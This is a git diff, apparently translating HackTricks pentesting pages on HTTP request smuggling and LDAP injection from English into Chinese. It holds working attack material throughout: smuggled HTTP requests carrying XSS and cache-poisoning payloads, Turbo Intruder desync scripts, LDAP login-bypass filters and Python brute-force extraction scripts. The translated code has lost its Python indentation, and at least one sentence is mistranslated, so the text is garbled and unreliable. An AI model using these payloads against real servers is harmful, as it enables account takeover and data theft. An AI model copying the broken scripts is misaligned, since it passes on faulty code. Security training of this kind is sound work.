-However, this technique has limitations. Generally, it captures data only up to the parameter delimiter used in the smuggled request. For URL-encoded form submissions, this delimiter is the `&` character. This means the captured content from the victim user's request will stop at the first `&`, which may even be part of the query string.
+此外，值得注意的是，这种方法在 TE.CL 漏洞中也是可行的。在这种情况下，请求应以 `search=\r\n0` 结束。无论换行符如何，值将附加到搜索参数。
 
-Additionally, it's worth noting that this approach is also viable with a TE.CL vulnerability. In such cases, the request should conclude with `search=\r\n0`. Regardless of newline characters, the values will be appended to the search parameter.
+### 使用 HTTP 请求走私来利用反射型 XSS
 
-### Using HTTP request smuggling to exploit reflected XSS
+HTTP 请求走私可以被用来利用易受 **反射型 XSS** 攻击的网页，提供显著的优势：
 
-HTTP Request Smuggling can be leveraged to exploit web pages vulnerable to **Reflected XSS**, offering significant advantages:
-
-- Interaction with the target users is **not required**.
-- Allows the exploitation of XSS in parts of the request that are **normally unattainable**, like HTTP request headers.
-
-In scenarios where a website is susceptible to Reflected XSS through the User-Agent header, the following payload demonstrates how to exploit this vulnerability:
+- **不需要**与目标用户互动。
+- 允许在 **通常无法达到** 的请求部分中利用 XSS，例如 HTTP 请求头。
 
+在网站通过 User-Agent 头部易受反射型 XSS 攻击的情况下，以下有效载荷演示了如何利用此漏洞：
 ```
 POST / HTTP/1.1
 Host: ac311fa41f0aa1e880b0594d008d009e.web-security-academy.net
@@ -430,42 +417,36 @@ Content-Type: application/x-www-form-urlencoded
 
 A=
 ```
+这个有效载荷的结构旨在利用漏洞，通过以下方式：
 
-This payload is structured to exploit the vulnerability by:
+1. 发起一个看似典型的 `POST` 请求，带有 `Transfer-Encoding: chunked` 头部以指示走私的开始。
+2. 随后跟随一个 `0`，标记块消息体的结束。
+3. 然后，引入一个走私的 `GET` 请求，其中 `User-Agent` 头部注入了一个脚本，`<script>alert(1)</script>`，当服务器处理这个后续请求时触发 XSS。
 
-1. Initiating a `POST` request, seemingly typical, with a `Transfer-Encoding: chunked` header to indicate the start of smuggling.
-2. Following with a `0`, marking the end of the chunked message body.
-3. Then, a smuggled `GET` request is introduced, where the `User-Agent` header is injected with a script, `<script>alert(1)</script>`, triggering the XSS when the server processes this subsequent request.
-
-By manipulating the `User-Agent` through smuggling, the payload bypasses normal request constraints, thus exploiting the Reflected XSS vulnerability in a non-standard but effective manner.
+通过走私操控 `User-Agent`，该有效载荷绕过了正常请求限制，从而以非标准但有效的方式利用了反射型 XSS 漏洞。
 
 #### HTTP/0.9
 
 > [!CAUTION]
-> In case the user content is reflected in a response with a **`Content-type`** such as **`text/plain`**, preventing the execution of the XSS. If the server support **HTTP/0.9 it might be possible to bypass this**!
+> 如果用户内容在响应中以 **`Content-type`** 反射，例如 **`text/plain`**，将阻止 XSS 的执行。如果服务器支持 **HTTP/0.9，可能可以绕过这一点**！
 
-The version HTTP/0.9 was previously to the 1.0 and only uses **GET** verbs and **doesn’t** respond with **headers**, just the body.
+HTTP/0.9 版本早于 1.0，仅使用 **GET** 动词，并且 **不** 响应 **头部**，只有主体。
 
-In [**this writeup**](https://mizu.re/post/twisty-python), this was abused with a request smuggling and a **vulnerable endpoint that will reply with the input of the user** to smuggle a request with HTTP/0.9. The parameter that will be reflected in the response contained a **fake HTTP/1.1 response (with headers and body)** so the response will contain valid executable JS code with a `Content-Type` of `text/html`.
+在 [**这篇文章**](https://mizu.re/post/twisty-python) 中，利用了请求走私和一个 **会回复用户输入的易受攻击端点** 来走私一个 HTTP/0.9 请求。响应中反射的参数包含一个 **伪造的 HTTP/1.1 响应（带有头部和主体）**，因此响应将包含有效的可执行 JS 代码，`Content-Type` 为 `text/html`。
 
-### Exploiting On-site Redirects with HTTP Request Smuggling <a href="#exploiting-on-site-redirects-with-http-request-smuggling" id="exploiting-on-site-redirects-with-http-request-smuggling"></a>
-
-Applications often redirect from one URL to another by using the hostname from the `Host` header in the redirect URL. This is common with web servers like Apache and IIS. For instance, requesting a folder without a trailing slash results in a redirect to include the slash:
+### 利用 HTTP 请求走私进行站内重定向 <a href="#exploiting-on-site-redirects-with-http-request-smuggling" id="exploiting-on-site-redirects-with-http-request-smuggling"></a>
 
+应用程序通常通过使用重定向 URL 中的 `Host` 头部的主机名从一个 URL 重定向到另一个 URL。这在像 Apache 和 IIS 这样的 Web 服务器中很常见。例如，请求一个没有尾部斜杠的文件夹会导致重定向以包含斜杠：
 ```
 GET /home HTTP/1.1
 Host: normal-website.com
 ```
-
-Results in:
-
+结果为：
 ```
 HTTP/1.1 301 Moved Permanently
 Location: https://normal-website.com/home/
 ```
-
-Though seemingly harmless, this behavior can be manipulated using HTTP request smuggling to redirect users to an external site. For example:
-
+尽管看似无害，但这种行为可以通过 HTTP request smuggling 被操控，以将用户重定向到外部网站。例如：
 ```
 POST / HTTP/1.1
 Host: vulnerable-website.com
@@ -479,35 +460,29 @@ GET /home HTTP/1.1
 Host: attacker-website.com
 Foo: X
 ```
-
-This smuggled request could cause the next processed user request to be redirected to an attacker-controlled website:
-
+这个被走私的请求可能导致下一个处理的用户请求被重定向到攻击者控制的网站：
 ```
 GET /home HTTP/1.1
 Host: attacker-website.com
 Foo: XGET /scripts/include.js HTTP/1.1
 Host: vulnerable-website.com
 ```
-
-Results in:
-
+结果为：
 ```
 HTTP/1.1 301 Moved Permanently
 Location: https://attacker-website.com/home/
 ```
+在这个场景中，用户对 JavaScript 文件的请求被劫持。攻击者可以通过响应恶意 JavaScript 来潜在地危害用户。
 
-In this scenario, a user's request for a JavaScript file is hijacked. The attacker can potentially compromise the user by serving malicious JavaScript in response.
+### 通过 HTTP 请求走私利用 Web 缓存中毒 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
 
-### Exploiting Web Cache Poisoning via HTTP Request Smuggling <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
+如果 **前端基础设施的任何组件缓存内容**，通常是为了提高性能，则可以执行 Web 缓存中毒。通过操纵服务器的响应，可以 **毒化缓存**。
 
-Web cache poisoning can be executed if any component of the **front-end infrastructure caches content**, typically to enhance performance. By manipulating the server's response, it's possible to **poison the cache**.
+之前，我们观察到如何改变服务器响应以返回 404 错误（参见 [Basic Examples](./#basic-examples)）。同样，可以欺骗服务器以响应对 `/static/include.js` 的请求而提供 `/index.html` 内容。因此，`/static/include.js` 的内容在缓存中被替换为 `/index.html` 的内容，使得 `/static/include.js` 对用户不可访问，可能导致服务拒绝（DoS）。
 
-Previously, we observed how server responses could be altered to return a 404 error (refer to [Basic Examples](./#basic-examples)). Similarly, it’s feasible to trick the server into delivering `/index.html` content in response to a request for `/static/include.js`. Consequently, the `/static/include.js` content gets replaced in the cache with that of `/index.html`, rendering `/static/include.js` inaccessible to users, potentially leading to a Denial of Service (DoS).
-
-This technique becomes particularly potent if an **Open Redirect vulnerability** is discovered or if there's an **on-site redirect to an open redirect**. Such vulnerabilities can be exploited to replace the cached content of `/static/include.js` with a script under the attacker's control, essentially enabling a widespread Cross-Site Scripting (XSS) attack against all clients requesting the updated `/static/include.js`.
-
-Below is an illustration of exploiting **cache poisoning combined with an on-site redirect to open redirect**. The objective is to alter the cache content of `/static/include.js` to serve JavaScript code controlled by the attacker:
+如果发现 **开放重定向漏洞** 或者存在 **指向开放重定向的站内重定向**，这种技术变得特别强大。这些漏洞可以被利用来将 `/static/include.js` 的缓存内容替换为攻击者控制的脚本，从而实质上使所有请求更新的 `/static/include.js` 的客户端面临广泛的跨站脚本（XSS）攻击。
 
+下面是利用 **缓存中毒结合站内重定向到开放重定向** 的示例。目标是改变 `/static/include.js` 的缓存内容，以提供由攻击者控制的 JavaScript 代码：
 ```
 POST / HTTP/1.1
 Host: vulnerable.net
@@ -525,22 +500,20 @@ Content-Length: 10
 
 x=1
 ```
+注意嵌入的请求针对 `/post/next?postId=3`。该请求将被重定向到 `/post?postId=4`，利用 **Host header value** 来确定域名。通过更改 **Host header**，攻击者可以将请求重定向到他们的域名 (**on-site redirect to open redirect**)。
 
-Note the embedded request targeting `/post/next?postId=3`. This request will be redirected to `/post?postId=4`, utilizing the **Host header value** to determine the domain. By altering the **Host header**, the attacker can redirect the request to their domain (**on-site redirect to open redirect**).
+在成功的 **socket poisoning** 之后，应发起对 `/static/include.js` 的 **GET request**。该请求将受到先前 **on-site redirect to open redirect** 请求的污染，并获取由攻击者控制的脚本内容。
 
-After successful **socket poisoning**, a **GET request** for `/static/include.js` should be initiated. This request will be contaminated by the prior **on-site redirect to open redirect** request and fetch the content of the script controlled by the attacker.
+随后，任何对 `/static/include.js` 的请求将提供攻击者脚本的缓存内容，有效地发起广泛的 XSS 攻击。
 
-Subsequently, any request for `/static/include.js` will serve the cached content of the attacker's script, effectively launching a broad XSS attack.
+### 使用 HTTP request smuggling 执行 web cache deception <a href="#using-http-request-smuggling-to-perform-web-cache-deception" id="using-http-request-smuggling-to-perform-web-cache-deception"></a>
 
-### Using HTTP request smuggling to perform web cache deception <a href="#using-http-request-smuggling-to-perform-web-cache-deception" id="using-http-request-smuggling-to-perform-web-cache-deception"></a>
-
-> **What is the difference between web cache poisoning and web cache deception?**
+> **web cache poisoning 和 web cache deception 之间有什么区别？**
 >
-> - In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.
-> - In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache.
-
-The attacker crafts a smuggled request that fetches sensitive user-specific content. Consider the following example:
+> - 在 **web cache poisoning** 中，攻击者导致应用程序在缓存中存储一些恶意内容，并且这些内容从缓存中提供给其他应用程序用户。
+> - 在 **web cache deception** 中，攻击者导致应用程序在缓存中存储属于另一个用户的一些敏感内容，然后攻击者从缓存中检索这些内容。
 
+攻击者构造一个走私请求，以获取敏感的用户特定内容。考虑以下示例：
 ```markdown
 `POST / HTTP/1.1`\
 `Host: vulnerable-website.com`\
@@ -551,21 +524,17 @@ The attacker crafts a smuggled request that fetches sensitive user-specific cont
 `GET /private/messages HTTP/1.1`\
 `Foo: X`
 ```
+如果这个走私请求污染了用于静态内容的缓存条目（例如，`/someimage.png`），受害者在`/private/messages`中的敏感数据可能会被缓存到静态内容的缓存条目下。因此，攻击者可能会检索到这些缓存的敏感数据。
 
-If this smuggled request poisons a cache entry intended for static content (e.g., `/someimage.png`), the victim's sensitive data from `/private/messages` might be cached under the static content's cache entry. Consequently, the attacker could potentially retrieve these cached sensitive data.
-
-### Abusing TRACE via HTTP Request Smuggling <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
-
-[**In this post**](https://portswigger.net/research/trace-desync-attack) is suggested that if the server has the method TRACE enabled it could be possible to abuse it with a HTTP Request Smuggling. This is because this method will reflect any header sent to the server as part of the body of the response. For example:
+### 通过 HTTP 请求走私滥用 TRACE <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
 
+[**在这篇文章中**](https://portswigger.net/research/trace-desync-attack) 建议如果服务器启用了 TRACE 方法，可能会通过 HTTP 请求走私进行滥用。这是因为该方法会将发送到服务器的任何头部反射为响应体的一部分。例如：
 ```
 TRACE / HTTP/1.1
 Host: example.com
 XSS: <script>alert("TRACE")</script>
 ```
-
-Will send a response such as:
-
+请发送您的请求。
 ```
 HTTP/1.1 200 OK
 Content-Type: message/http
@@ -576,19 +545,17 @@ Host: vulnerable.com
 XSS: <script>alert("TRACE")</script>
 X-Forwarded-For: xxx.xxx.xxx.xxx
 ```
+一个滥用这种行为的例子是**首先伪装一个HEAD请求**。该请求将仅以GET请求的**头部**进行响应（**`Content-Type`**在其中）。然后立即在HEAD请求后伪装一个TRACE请求，这将**反射发送的数据**。\
+由于HEAD响应将包含一个`Content-Length`头，**TRACE请求的响应将被视为HEAD响应的主体，因此在响应中反射任意数据**。\
+该响应将被发送到连接上的下一个请求，因此这可以**用于缓存的JS文件中，例如注入任意JS代码**。
 
-An example on how to abuse this behaviour would be to **smuggle first a HEAD request**. This request will be responded with only the **headers** of a GET request (**`Content-Type`** among them). And smuggle **immediately after the HEAD a TRACE request**, which will be **reflecting the sent dat**a.\
-As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response.\
-This response will be sent to the next request over the connection, so this could be **used in a cached JS file for example to inject arbitrary JS code**.
+### 通过HTTP响应拆分滥用TRACE <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
 
-### Abusing TRACE via HTTP Response Splitting <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
+继续关注[**这篇文章**](https://portswigger.net/research/trace-desync-attack)建议另一种滥用TRACE方法的方式。如评论所述，伪装一个HEAD请求和一个TRACE请求可以**控制HEAD请求响应中的一些反射数据**。HEAD请求主体的长度基本上在Content-Length头中指示，并由TRACE请求的响应形成。
 
-Continue following [**this post**](https://portswigger.net/research/trace-desync-attack) is suggested another way to abuse the TRACE method. As commented, smuggling a HEAD request and a TRACE request it's possible to **control some reflected data** in the response to the HEAD request. The length of the body of the HEAD request is basically indicated in the Content-Length header and is formed by the response to the TRACE request.
-
-Therefore, the new idea would be that, knowing this Content-Length and the data given in the TRACE response, it's possible to make the TRACE response contains a valid HTTP response after the last byte of the Content-Length, allowing an attacker to completely control the request to the next response (which could be used to perform a cache poisoning).
-
-Example:
+因此，新的想法是，知道这个Content-Length和TRACE响应中给出的数据，可以使TRACE响应在Content-Length的最后一个字节之后包含一个有效的HTTP响应，从而允许攻击者完全控制下一个响应的请求（这可以用于执行缓存中毒）。 
 
+示例：
 ```
 GET / HTTP/1.1
 Host: example.com
@@ -607,9 +574,7 @@ Content-Length: 44\r\n
 \r\n
 <script>alert("response splitting")</script>
 ```
-
-Will generate these responses (note how the HEAD response has a Content-Length making the TRACE response part of the HEAD body and once the HEAD Content-Length ends a valid HTTP response is smuggled):
-
+将生成这些响应（注意HEAD响应具有Content-Length，使得TRACE响应成为HEAD主体的一部分，一旦HEAD Content-Length结束，一个有效的HTTP响应被走私）：
 ```
 HTTP/1.1 200 OK
 Content-Type: text/html
@@ -630,51 +595,49 @@ Content-Length: 50
 
 <script>alert(“arbitrary response”)</script>
 ```
+### 利用 HTTP 响应去同步化进行 HTTP 请求走私
 
-### Weaponizing HTTP Request Smuggling with HTTP Response Desynchronisation
-
-Have you found some HTTP Request Smuggling vulnerability and you don't know how to exploit it. Try these other method of exploitation:
+您是否发现了一些 HTTP 请求走私漏洞，但不知道如何利用它？尝试这些其他的利用方法：
 
 {{#ref}}
 ../http-response-smuggling-desync.md
 {{#endref}}
 
-### Other HTTP Request Smuggling Techniques
+### 其他 HTTP 请求走私技术
 
-- Browser HTTP Request Smuggling (Client Side)
+- 浏览器 HTTP 请求走私（客户端）
 
 {{#ref}}
 browser-http-request-smuggling.md
 {{#endref}}
 
-- Request Smuggling in HTTP/2 Downgrades
+- HTTP/2 降级中的请求走私
 
 {{#ref}}
 request-smuggling-in-http-2-downgrades.md
 {{#endref}}
 
-## Turbo intruder scripts
+## Turbo intruder 脚本
 
 ### CL.TE
 
-From [https://hipotermia.pw/bb/http-desync-idor](https://hipotermia.pw/bb/http-desync-idor)
-
+来自 [https://hipotermia.pw/bb/http-desync-idor](https://hipotermia.pw/bb/http-desync-idor)
 ```python
 def queueRequests(target, wordlists):
 
-    engine = RequestEngine(endpoint=target.endpoint,
-                           concurrentConnections=5,
-                           requestsPerConnection=1,
-                           resumeSSL=False,
-                           timeout=10,
-                           pipeline=False,
-                           maxRetriesPerRequest=0,
-                           engine=Engine.THREADED,
-                           )
-    engine.start()
+engine = RequestEngine(endpoint=target.endpoint,
+concurrentConnections=5,
+requestsPerConnection=1,
+resumeSSL=False,
+timeout=10,
+pipeline=False,
+maxRetriesPerRequest=0,
+engine=Engine.THREADED,
+)
+engine.start()
 
-    attack = '''POST / HTTP/1.1
- Transfer-Encoding: chunked
+attack = '''POST / HTTP/1.1
+Transfer-Encoding: chunked
 Host: xxx.com
 Content-Length: 35
 Foo: bar
@@ -684,38 +647,36 @@ Foo: bar
 GET /admin7 HTTP/1.1
 X-Foo: k'''
 
-    engine.queue(attack)
+engine.queue(attack)
 
-    victim = '''GET / HTTP/1.1
+victim = '''GET / HTTP/1.1
 Host: xxx.com
 
 '''
-    for i in range(14):
-        engine.queue(victim)
-        time.sleep(0.05)
+for i in range(14):
+engine.queue(victim)
+time.sleep(0.05)
 
 def handleResponse(req, interesting):
-    table.add(req)
+table.add(req)
 ```
-
 ### TE.CL
 
-From: [https://hipotermia.pw/bb/http-desync-account-takeover](https://hipotermia.pw/bb/http-desync-account-takeover)
-
+来自: [https://hipotermia.pw/bb/http-desync-account-takeover](https://hipotermia.pw/bb/http-desync-account-takeover)
 ```python
 def queueRequests(target, wordlists):
-    engine = RequestEngine(endpoint=target.endpoint,
-                           concurrentConnections=5,
-                           requestsPerConnection=1,
-                           resumeSSL=False,
-                           timeout=10,
-                           pipeline=False,
-                           maxRetriesPerRequest=0,
-                           engine=Engine.THREADED,
-                           )
-    engine.start()
+engine = RequestEngine(endpoint=target.endpoint,
+concurrentConnections=5,
+requestsPerConnection=1,
+resumeSSL=False,
+timeout=10,
+pipeline=False,
+maxRetriesPerRequest=0,
+engine=Engine.THREADED,
+)
+engine.start()
 
-    attack = '''POST / HTTP/1.1
+attack = '''POST / HTTP/1.1
 Host: xxx.com
 Content-Length: 4
 Transfer-Encoding : chunked
@@ -729,31 +690,30 @@ kk
 0
 
 '''
-    engine.queue(attack)
+engine.queue(attack)
 
-    victim = '''GET / HTTP/1.1
+victim = '''GET / HTTP/1.1
 Host: xxx.com
 
 '''
-    for i in range(14):
-        engine.queue(victim)
-        time.sleep(0.05)
+for i in range(14):
+engine.queue(victim)
+time.sleep(0.05)
 
 
 def handleResponse(req, interesting):
-    table.add(req)
+table.add(req)
 ```
-
-## Tools
+## 工具
 
 - [https://github.com/anshumanpattnaik/http-request-smuggling](https://github.com/anshumanpattnaik/http-request-smuggling)
 - [https://github.com/PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler)
 - [https://github.com/gwen001/pentest-tools/blob/master/smuggler.py](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)
 - [https://github.com/defparam/smuggler](https://github.com/defparam/smuggler)
 - [https://github.com/Moopinger/smugglefuzz](https://github.com/Moopinger/smugglefuzz)
-- [https://github.com/bahruzjabiyev/t-reqs-http-fuzzer](https://github.com/bahruzjabiyev/t-reqs-http-fuzzer): This tool is a grammar-based HTTP Fuzzer useful to find weird request smuggling discrepancies.
+- [https://github.com/bahruzjabiyev/t-reqs-http-fuzzer](https://github.com/bahruzjabiyev/t-reqs-http-fuzzer): 该工具是一个基于语法的HTTP Fuzzer，有助于发现奇怪的请求走私差异。
 
-## References
+## 参考
 
 - [https://portswigger.net/web-security/request-smuggling](https://portswigger.net/web-security/request-smuggling)
 - [https://portswigger.net/web-security/request-smuggling/finding](https://portswigger.net/web-security/request-smuggling/finding)
@@ -767,11 +727,10 @@ def handleResponse(req, interesting):
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化漏洞收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
index 33be45744..c76e21b9e 100644
--- a/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
+++ b/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
@@ -1,8 +1,7 @@
-# Browser HTTP Request Smuggling
+# 浏览器 HTTP 请求走私
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check the post [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
+**查看帖子 [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
index cf988ec09..a2699383c 100644
--- a/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
+++ b/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
@@ -1,8 +1,7 @@
-# Request Smuggling in HTTP/2 Downgrades
+# HTTP/2降级中的请求走私
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check the post [https://portswigger.net/research/http-2-downgrades](https://portswigger.net/research/http-2-downgrades)**
+**查看帖子 [https://portswigger.net/research/http-2-downgrades](https://portswigger.net/research/http-2-downgrades)**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md
index dbed29ef8..7ee068090 100644
--- a/src/pentesting-web/ldap-injection.md
+++ b/src/pentesting-web/ldap-injection.md
@@ -1,26 +1,26 @@
-# LDAP Injection
+# LDAP 注入
 
-## LDAP Injection
+## LDAP 注入
 
 {{#include ../banners/hacktricks-training.md}}
 
 <figure><img src="../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！** (_需要流利的波兰语书写和口语能力_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-## LDAP Injection
+## LDAP 注入
 
 ### **LDAP**
 
-**If you want to know what is LDAP access the following page:**
+**如果你想知道什么是 LDAP，请访问以下页面：**
 
 {{#ref}}
 ../network-services-pentesting/pentesting-ldap.md
 {{#endref}}
 
-**LDAP Injection** is an attack targeting web applications that construct LDAP statements from user input. It occurs when the application **fails to properly sanitize** input, allowing attackers to **manipulate LDAP statements** through a local proxy, potentially leading to unauthorized access or data manipulation.
+**LDAP 注入** 是一种针对从用户输入构建 LDAP 语句的 web 应用程序的攻击。当应用程序 **未能正确清理** 输入时，攻击者可以通过本地代理 **操纵 LDAP 语句**，这可能导致未经授权的访问或数据操纵。
 
 {% file src="../images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
 
@@ -37,33 +37,32 @@ If you are interested in **hacking career** and hack the unhackable - **we are h
 **Substring** = attr ”=” \[initial] \* \[final]\
 **Initial** = assertionvalue\
 **Final** = assertionvalue\
-&#xNAN;**(&)** = Absolute TRUE\
-&#xNAN;**(|)** = Absolute FALSE
+&#xNAN;**(&)** = 绝对真\
+&#xNAN;**(|)** = 绝对假
 
-For example:\
+例如：\
 `(&(!(objectClass=Impresoras))(uid=s*))`\
 `(&(objectClass=user)(uid=*))`
 
-You can access to the database, and this can content information of a lot of different types.
+你可以访问数据库，这可能包含多种不同类型的信息。
 
-**OpenLDAP**: If 2 filters arrive, only executes the first one.\
-**ADAM or Microsoft LDS**: With 2 filters they throw an error.\
-**SunOne Directory Server 5.0**: Execute both filters.
+**OpenLDAP**: 如果到达 2 个过滤器，只执行第一个。\
+**ADAM 或 Microsoft LDS**: 2 个过滤器会抛出错误。\
+**SunOne Directory Server 5.0**: 执行两个过滤器。
 
-**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
+**发送过滤器时使用正确的语法非常重要，否则会抛出错误。最好只发送 1 个过滤器。**
 
-The filter has to start with: `&` or `|`\
-Example: `(&(directory=val1)(folder=public))`
+过滤器必须以 `&` 或 `|` 开头\
+示例: `(&(directory=val1)(folder=public))`
 
 `(&(objectClass=VALUE1)(type=Epson*))`\
 `VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
 
-Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter (the one executed).
+然后: `(&(objectClass=`**`*)(ObjectClass=*))`** 将是第一个过滤器（被执行的那个）。
 
-### Login Bypass
-
-LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
+### 登录绕过
 
+LDAP 支持多种格式来存储密码：明文、md5、smd5、sh1、sha、crypt。因此，可能无论你在密码中插入什么，它都会被哈希处理。
 ```bash
 user=*
 password=*
@@ -118,17 +117,15 @@ username=admin))(|(|
 password=any
 --> (&(uid=admin)) (| (|) (webpassword=any))
 ```
-
-#### Lists
+#### 列表
 
 - [LDAP_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
-- [LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
-- [LDAP PosixAccount attributes](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)
+- [LDAP 属性](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
+- [LDAP PosixAccount 属性](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)
 
-### Blind LDAP Injection
-
-You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
+### 隐式 LDAP 注入
 
+您可以强制返回 False 或 True 响应，以检查是否返回任何数据并确认可能的隐式 LDAP 注入：
 ```bash
 #This will result on True, so some information will be shown
 Payload: *)(objectClass=*))(&objectClass=void
@@ -140,11 +137,9 @@ Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
 Payload: void)(objectClass=void))(&objectClass=void
 Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
 ```
-
 #### Dump data
 
-You can iterate over the ascii letters, digits and symbols:
-
+您可以遍历 ASCII 字母、数字和符号：
 ```bash
 (&(sn=administrator)(password=*))    : OK
 (&(sn=administrator)(password=A*))   : KO
@@ -155,13 +150,11 @@ You can iterate over the ascii letters, digits and symbols:
 (&(sn=administrator)(password=MB*))  : KO
 ...
 ```
-
 ### Scripts
 
-#### **Discover valid LDAP fields**
-
-LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
+#### **发现有效的LDAP字段**
 
+LDAP对象**默认包含多个属性**，可以用来**保存信息**。你可以尝试**暴力破解所有这些属性以提取信息。** 你可以在[**这里找到默认的LDAP属性列表**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)。
 ```python
 #!/usr/bin/python3
 import requests
@@ -176,26 +169,24 @@ alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
 attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
 
 for attribute in attributes: #Extract all attributes
-    value = ""
-    finish = False
-    while not finish:
-        for char in alphabet: #In each possition test each possible printable char
-            query = f"*)({attribute}={value}{char}*"
-            data = {'login':query, 'password':'bla'}
-            r = requests.post(url, data=data, proxies=proxy)
-            sys.stdout.write(f"\r{attribute}: {value}{char}")
-            #sleep(0.5) #Avoid brute-force bans
-            if "Cannot login" in r.text:
-                value += str(char)
-                break
+value = ""
+finish = False
+while not finish:
+for char in alphabet: #In each possition test each possible printable char
+query = f"*)({attribute}={value}{char}*"
+data = {'login':query, 'password':'bla'}
+r = requests.post(url, data=data, proxies=proxy)
+sys.stdout.write(f"\r{attribute}: {value}{char}")
+#sleep(0.5) #Avoid brute-force bans
+if "Cannot login" in r.text:
+value += str(char)
+break
 
-            if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
-                finish = True
-                print()
+if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
+finish = True
+print()
 ```
-
-#### **Special Blind LDAP Injection (without "\*")**
-
+#### **特殊盲 LDAP 注入（不带 "\*"）**
 ```python
 #!/usr/bin/python3
 
@@ -204,30 +195,26 @@ alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
 
 flag = ""
 for i in range(50):
-    print("[i] Looking for number " + str(i))
-    for char in alphabet:
-        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
-        if ("TRUE CONDITION" in r.text):
-            flag += char
-            print("[+] Flag: " + flag)
-            break
+print("[i] Looking for number " + str(i))
+for char in alphabet:
+r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
+if ("TRUE CONDITION" in r.text):
+flag += char
+print("[+] Flag: " + flag)
+break
 ```
-
 ### Google Dorks
-
 ```bash
 intitle:"phpLDAPadmin" inurl:cmd.php
 ```
-
-### More Payloads
